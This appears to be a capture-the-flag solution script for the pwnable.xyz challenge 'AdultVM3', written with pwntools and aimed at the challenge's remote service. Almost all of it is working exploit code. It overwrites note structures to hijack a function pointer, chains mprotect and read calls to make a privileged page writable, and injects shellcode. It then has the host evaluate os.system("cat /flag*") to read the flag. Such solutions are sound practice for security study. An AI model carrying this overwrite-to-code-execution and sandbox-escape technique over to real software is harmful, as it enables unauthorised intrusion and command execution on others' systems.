[pwnable.xyz] AdultVM3

from pwn import *
#context.log_level = "debug"

#p = process("./userland")
p = remote("svc.pwnable.xyz", 30048)

ru = lambda a : p.recvuntil(a)
snd = lambda a : p.send(a)
snl = lambda a : p.sendline(a)

def show(idx):
    ru(b"Exit\n")
    snl(b"2")
    ru(b": ")
    snl(str(idx).encode())

def edit(idx, data):
    ru(b"Exit\n")
    snl(b"1")
    ru(b": ")
    snl(str(idx).encode())
    ru(b": ")
    snd(data)


syscall = 0x0004000338
read = 0x04000400
note = 0x004100380


# 10 = mprotect

for i in range(9):
    edit(i, (b"A" * 0x38) + b"\n")

# notes[id].show(notes[id].id, notes[id].note, notes[id].size, notes[id].serial);

pay = b"A" * 8
pay += p64(0)
pay += p64(note)
pay += p64(0x78)
pay += p64(0)
pay += p64(read)
pay += b"\n"
edit(9, pay)
show(0)

# set priv
pay = p64(10)
pay += p64(0xFFFFFFFF81000000)
pay += p64(0x1000)
pay += p64(7)
pay += p64(syscall)
# ====== read
pay += p64(0)
pay += p64(0xFFFFFFFF8100013E)
pay += p64(8 + len(b"os.system(\"cat flag*\")\x00"))
pay += p64(0)
pay += p64(read)

# ====== eval
pay += p64(11)
pay += p64(0xFFFFFFFF8100013E + 8)
pay += p64(0)
pay += p64(len(b"os.system(\"cat flag*\")\x00"))
pay += p64(syscall)
snd(pay)
sleep(0.1)

show(0)
show(1)

"""
seg000:FFFFFFFF81000136 B8 00 00 00 00                    mov     eax, 0          ; jumptable FFFFFFFF810000B0 case 10
seg000:FFFFFFFF8100013B CD 70                             int     70h             ; IRQ8 - AT/XT286/PS50+ - REAL-TIME CLOCK
seg000:FFFFFFFF8100013D CF                                iret

"""

pay = b"\xb8\x07\x00\x00\x00\xcd\x70\xcf"
pay += b"os.system(\"cat /flag*\")\x00"

snd(pay)

ru(b"Exit\n")
snl(b"2")
show(2)

p.interactive()